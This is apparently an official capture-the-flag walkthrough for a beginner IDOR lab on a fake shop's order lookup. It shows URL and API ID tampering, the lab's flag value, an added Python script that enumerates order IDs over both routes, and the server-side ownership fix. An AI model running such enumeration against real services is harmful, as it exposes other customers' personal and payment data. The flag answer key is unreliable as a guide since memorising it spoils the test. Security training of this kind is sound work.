HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

Order Lookup — Crapazon

IDOR & Access Control · Insecure Direct Object Reference (IDOR)
Difficulty
Beginner
Vuln class
Insecure Direct Object Reference (IDOR)
Steps
4
// Objective
Access order details belonging to other customers by manipulating the order ID parameter.
// Tools required
Browser, Burp Suite, Developer Tools
// Step-by-step walkthrough
1
Log in and view your own order
Log in with the provided test credentials and navigate to your order history. Click on any order to view its details. Note the URL.
Command / Input
https://target.lab/orders/1042
The number at the end is your order ID. This is the object reference we'll be manipulating.
2
Test for IDOR by changing the ID
Manually change the order ID in the URL to a different number. If the application only checks that you are logged in (authentication) and never checks that the requested order belongs to your account (authorization), it will show you someone else's data. A correctly built application returns 403 or 404 here.
Command / Input
https://target.lab/orders/1041
https://target.lab/orders/1000
https://target.lab/orders/1337
3
Find the flag order
One of the order IDs contains the flag. Try iterating through IDs around yours, or try commonly significant numbers.
Command / Input
https://target.lab/orders/1337
Output
Order #1337 — Customer: admin@crapazon.com Item: FLAG Contents: HackrGG{1d0r_0rd3r_1337_4cc3ss}
A real IDOR here would expose PII, payment info, addresses, and purchase history of every customer on the platform. The fix is to scope the lookup to the authenticated user on the server side (look up the order by ID and owner together, and treat a mismatch like a non-existent order); making IDs unguessable is not a substitute for that check.
4
Verify via API endpoint
Check whether there is also an API endpoint with the same vulnerability. Open DevTools → Network tab, reload the order page, and look for XHR/fetch requests. Replay the request with a different order ID (Burp Repeater works well for this); the API is usually a separate code path and may be missing the ownership check even where the HTML page has it.
Command / Input
GET /api/orders/1337
Authorization: Bearer <your_token>
Output
{"id":1337,"flag":"HackrGG{1d0r_0rd3r_1337_4cc3ss}","customer":"admin"}
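The four steps above can be scripted once you have a logged-in session. The Python below is an added example written for this walkthrough, not code from hackr.gg or the Crapazon lab: it builds a candidate list (a window around your own order plus the "significant" numbers from step 3), requests each ID through both the HTML route and the JSON API, and classifies responses as exposed (200 for an order that is not yours), denied (401/403) or missing (404). The host target.lab and the two URL shapes come from the walkthrough; the session cookie name, the `live_fetch` helper and the `fake_lab_fetch` responses are assumptions, and the fake is a constructed stand-in so the script runs offline. Keep the probe window inside the lab's scope.

```python
"""Enumerate order IDs with your own session and report which ones the app
serves without an ownership check (Crapazon IDOR lab).  Added example, not
code from hackr.gg.  BASE_URL, the cookie name and the fake lab responses
below are assumptions, not facts from the walkthrough."""
import json
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable, List, Tuple

BASE_URL = "https://target.lab"            # host used in the walkthrough
FLAG_RE = re.compile(r"HackrGG\{[^}]+\}")  # flag format shown in step 3

# A fetcher returns (status_code, body) for a path.  It is injected so the
# probing logic can be exercised offline against a fake of the lab.
Fetcher = Callable[[str, Dict[str, str]], Tuple[int, str]]


def live_fetch(path: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Real HTTP GET via the standard library.  Put your session cookie or
    bearer token in `headers`.  Non-2xx responses are returned, not raised."""
    req = urllib.request.Request(BASE_URL + path, headers=headers)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def candidate_ids(own_id: int, radius: int = 5,
                  extras: Iterable[int] = (1000, 1337)) -> List[int]:
    """IDs to probe: a window around your own order plus the 'significant'
    numbers the walkthrough suggests.  Your own ID is excluded."""
    ids = set(range(own_id - radius, own_id + radius + 1)) | set(extras)
    ids.discard(own_id)
    return sorted(i for i in ids if i > 0)


def classify(status: int) -> str:
    """Verdict for one response: a 200 for an ID that is not yours is an
    IDOR hit; 401/403 means an access check exists; 404 means no object."""
    if status == 200:
        return "exposed"
    if status in (401, 403):
        return "denied"
    if status == 404:
        return "missing"
    return f"other({status})"


def probe(fetch: Fetcher, own_id: int, headers: Dict[str, str],
          api: bool = False) -> Dict[int, dict]:
    """Request each candidate through /orders/<id> (HTML) or
    /api/orders/<id> (JSON) and record the verdict plus any flag found."""
    results = {}
    for oid in candidate_ids(own_id):
        path = f"/api/orders/{oid}" if api else f"/orders/{oid}"
        status, body = fetch(path, headers)
        match = FLAG_RE.search(body)
        results[oid] = {"verdict": classify(status),
                        "flag": match.group(0) if match else None}
    return results


def exposed_ids(results: Dict[int, dict]) -> List[int]:
    """IDs the application served although they are not ours."""
    return sorted(i for i, r in results.items() if r["verdict"] == "exposed")


# ---- constructed fake of the lab so the script runs offline ---------------
# Only 1042 (yours), 1041, 1000 and 1337 (flag) are known from the
# walkthrough; the customer names and items for the first three are invented.
_FAKE_ORDERS = {
    1042: {"customer": "test@crapazon.com", "item": "USB cable"},
    1041: {"customer": "bob@crapazon.com", "item": "Headphones"},
    1000: {"customer": "alice@crapazon.com", "item": "Toaster"},
    1337: {"customer": "admin@crapazon.com", "item": "FLAG",
           "contents": "HackrGG{1d0r_0rd3r_1337_4cc3ss}"},
}


def fake_lab_fetch(path: str, headers: Dict[str, str]) -> Tuple[int, str]:
    """Vulnerable behaviour: any authenticated caller gets any existing
    order; the owner is never compared with the caller."""
    if "Cookie" not in headers and "Authorization" not in headers:
        return 401, "login required"
    oid = int(path.rsplit("/", 1)[1])
    order = _FAKE_ORDERS.get(oid)
    if order is None:
        return 404, "no such order"
    if path.startswith("/api/"):
        return 200, json.dumps({"id": oid, **order})
    return 200, (f"Order #{oid} - Customer: {order['customer']} "
                 f"Item: {order['item']} Contents: {order.get('contents', '')}")


if __name__ == "__main__":
    # Swap fake_lab_fetch for live_fetch and a real cookie to run in the lab.
    hits = probe(fake_lab_fetch, own_id=1042, headers={"Cookie": "session=x"})
    for oid in exposed_ids(hits):
        print(oid, hits[oid])
```

Against the fake, the HTML probe reports 1000, 1041 and 1337 as exposed and pulls the flag out of order 1337; running it with `api=True` shows the JSON route has the same gap, which is the point of step 4. Against a patched application every ID other than your own should come back as denied or missing.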
// Flag
Flag value
HackrGG{1d0r_0rd3r_1337_4cc3ss}
Found in order #1337 which belongs to another customer.